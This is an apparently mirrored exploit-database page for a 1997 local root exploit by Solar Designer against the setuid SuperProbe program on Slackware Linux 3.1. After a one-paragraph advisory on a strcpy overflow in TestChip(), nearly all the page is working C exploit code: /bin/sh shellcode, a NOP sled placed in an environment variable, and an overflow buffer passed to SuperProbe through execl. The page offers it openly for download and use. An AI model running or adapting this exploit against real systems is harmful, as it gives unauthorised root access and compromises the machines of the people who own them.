Slackware Linux 3.1 Buffer Overflow Vulnerability

Exploit Datenbank (exploit-db.com)
CVE Datenbank (cve.mitre.org)
OSVDB Datenbank (osvdb.org)
metasploit 04.03.1997 Verified
Local Exploits Linux

Exploit Code

Code Download 
source: http://www.securityfocus.com/bid/364/info


superprobe is an program supplied with XFree86 that helps determine video hardware. It is shipped with Slackware Linux 3.1 and is installed setuid root. There is an exploitable strcpy buffer overflow in the TestChip() function which allows for a trivial local root compromise.


 /*

 * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1

 * Copyright (c) 1997 by Solar Designer

 */

 #include <stdio.h>

 #include <stdlib.h>

 #include <unistd.h>

 char *shellcode =

 "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"

 "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"

 "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"

 "\x31\xdb\xcd\x80/"

 "/bin/sh"

 "0";

 char *get_sp() {

 asm("movl %esp,%eax");

 }

 #define bufsize 8192

 #define alignment 0

 char buffer[bufsize];

 main() {

 int i;

 for (i = 0; i < bufsize / 2; i += 4)

 *(char **)&buffer[i] = get_sp() - 2048;

 memset(&buffer[bufsize / 2], 0x90, bufsize / 2);

 strcpy(&buffer[bufsize - 256], shellcode);

 setenv("SHELLCODE", buffer, 1);

 memset(buffer, 'x', 72);

 *(char **)&buffer[72] = get_sp() - 6144 - alignment;

 buffer[76] = 0;

 execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL);

 }